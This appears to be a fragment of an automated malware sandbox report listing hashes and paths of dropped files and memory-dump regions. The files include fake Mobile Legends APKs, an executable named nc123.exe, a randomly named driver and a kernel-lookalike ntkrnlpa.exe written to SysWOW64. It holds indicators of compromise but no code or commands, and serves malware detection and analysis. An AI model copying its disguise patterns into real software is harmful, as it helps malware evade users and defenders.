| SHA512 | 0ad658d53c455f7e68c3a4722f475bba65c22f17fd2c330a1ed34bff384462ceae9096c2d2e9cb4ad35168c551d579ca6b7335728432e94661dc8f65cdd14c58 |
C:\Users\Admin\Desktop\New folder\Mobile_Legends_Adventure.apk
| MD5 | 42585ccd2b7867c12052653e4d54b7cc |
| SHA1 | a9348c3aabcc0171d1e35edeb37fd2da0fff0ad4 |
| SHA256 | b47bcc55ca8dc0625a145d6809cfa3ad78e9e3b4f33bc608b5bcaf7e9e1e5827 |
| SHA512 | e270bd1fbbaaccf3382048e9ac2489444a735ed32fb83f7681526a1edb0b7847d6adb8d75064b065309293ef75c45e2ea85fb132a1c12afd08b3a1346caad550 |
C:\Users\Admin\Desktop\New folder\mobelejen.apk
| MD5 | 45be5a7857a4fa1c5eadd519e9402e8a |
| SHA1 | 36feb0809c1853f9a1f6d587302691abd7ce90e9 |
| SHA256 | 7d59e24f4bdf28a846d21e2608796f7e91389c4778bec75369d7b05e3f8449a5 |
| SHA512 | 46c869051e0c97b68f4388b87caecd82bf7362110a34ebb28ddc5fcd6c8a0e339eeaafbfce54d22593e245457fae7ec4c36b49a8556d3327ba7f90a40dd96a73 |
C:\Users\Admin\Desktop\New folder\ac\nc123.exe
| MD5 | 597de376b1f80c06d501415dd973dcec |
| SHA1 | 629c9649ced38fd815124221b80c9d9c59a85e74 |
| SHA256 | f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446 |
| SHA512 | 072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b |
C:\Users\Admin\Desktop\New folder\ac\mssql.exe
| MD5 | f6a3d38aa0ae08c3294d6ed26266693f |
| SHA1 | 9ced15d08ffddb01db3912d8af14fb6cc91773f2 |
| SHA256 | c522e0b5332cac67cde8fc84080db3b8f2e0fe85f178d788e38b35bbe4d464ad |
| SHA512 | 814b1130a078dcb6ec59dbfe657724e36aa3db64ed9b2f93d8559b6a50e512365c8596240174141d6977b5ddcf7f281add7886c456dc7463c97f432507e73515 |
C:\Users\Admin\Desktop\New folder\ac\mssql2.exe
| MD5 | f7d94750703f0c1ddd1edd36f6d0371d |
| SHA1 | cc9b95e5952e1c870f7be55d3c77020e56c34b57 |
| SHA256 | 659e441cadd42399fc286b92bbc456ff2e9ecb24984c0586acf83d73c772b45d |
| SHA512 | af0ced00dc6eeaf6fb3336d9b3abcc199fb42561b8ce24ff2e6199966ad539bc2387ba83a4838301594e50e36844796e96c30a9aa9ad5f03cf06860f3f44e0fa |
C:\Users\Admin\Desktop\New folder\ac\igvfpxuxmkoorey.sys
| MD5 | b2233d1efb0b7a897ea477a66cd08227 |
| SHA1 | 835a198a11c9d106fc6aabe26b9b3e59f6ec68fd |
| SHA256 | 5fd17e3b8827b5bb515343bc4066be0814f6466fb4294501becac284a378c0da |
| SHA512 | 6ca61854db877d767ce587ac3d7526cda8254d937a159fd985e0475d062d07ae83e7ff4f9f42c7e1e1cad5e1f408f6849866aa4e9e48b29d80510e5c695cee37 |
memory/3852-701-0x0000000000400000-0x0000000000B02000-memory.dmp
C:\Users\Admin\Desktop\New folder\ac\EVER\SearchHost.exe
| MD5 | 8add121fa398ebf83e8b5db8f17b45e0 |
| SHA1 | c8107e5c5e20349a39d32f424668139a36e6cfd0 |
| SHA256 | 35c4a6c1474eb870eec901cef823cc4931919a4e963c432ce9efbb30c2d8a413 |
| SHA512 | 8f81c4552ff561eea9802e5319adcd6c7e5bdd1dc4c91e56fda6bdc9b7e8167b222500a0aee5cf27b0345d1c19ac9fa95ae4fd58d4c359a5232bcf86f03d2273 |
memory/2372-713-0x0000000140000000-0x0000000140ACB000-memory.dmp
memory/3852-714-0x0000000000400000-0x0000000000B02000-memory.dmp
memory/2484-715-0x000000001BA10000-0x000000001BE3E000-memory.dmp
memory/2484-720-0x000000001C510000-0x000000001C9DE000-memory.dmp
memory/3908-731-0x0000000002500000-0x0000000002532000-memory.dmp
memory/3908-740-0x0000000002650000-0x0000000002682000-memory.dmp
memory/3908-905-0x0000000004DA0000-0x0000000005346000-memory.dmp
memory/3908-907-0x0000000004C30000-0x0000000004CC2000-memory.dmp
memory/3908-947-0x0000000004D70000-0x0000000004D7A000-memory.dmp
memory/3908-838-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-836-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-834-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-832-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-830-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-828-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-826-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-824-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-822-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-820-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-818-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-816-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-814-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-812-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-810-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-808-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-806-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-804-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-802-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-800-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-798-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-796-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-794-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-792-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-790-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-788-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-784-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-782-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-780-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-779-0x0000000002650000-0x000000000267B000-memory.dmp
C:\Windows\SysWOW64\ntkrnlpa.exe
| MD5 | 30cdab5cf1d607ee7b34f44ab38e9190 |
| SHA1 | d4823f90d14eba0801653e8c970f47d54f655d36 |
| SHA256 | 1517527c1d705a6ebc6ec9194aa95459e875ac3902a9f4aab3bf24b6a6f8407f |
| SHA512 | b465f3b734beaea3951ff57759f13971649b549fafca71342b52d7e74949e152c0fbafe2df40354fc00b5dc8c767f3f5c6940e4ba308888e4395d8fd21e402b3 |
C:\Windows\SysWOW64\ntkrnlpa.exe:Zone.Identifier
| MD5 | c6c7806bab4e3c932bb5acb3280b793e |
| SHA1 | a2a90b8008e5b27bdc53a15dc345be1d8bd5386b |
| SHA256 | 5ba37b532dbb714d29f33e79dacb5740096fd1e89da0a07b9b8e6b803931c61a |
| SHA512 | c648be984413fdbaeb34808c8164c48b5441a8f3f35533b189f420230e5e90605c15fde2ce0d9fe42e9755c594dd1ef32de71a24016277ad2cef2f9afcf0ad93 |
memory/3908-840-0x0000000002650000-0x000000000267B000-memory.dmp
memory/3908-787-0x0000000002650000-0x000000000267B000-memory.dmp
memory/2484-952-0x000000001D710000-0x000000001DC20000-memory.dmp
memory/2484-953-0x000000001DCC0000-0x000000001DD5C000-memory.dmp
memory/3632-955-0x0000000000400000-0x0000000000404000-memory.dmp
memory/2484-956-0x00000000013F0000-0x00000000013F8000-memory.dmp
memory/3852-957-0x0000000000400000-0x0000000000B02000-memory.dmp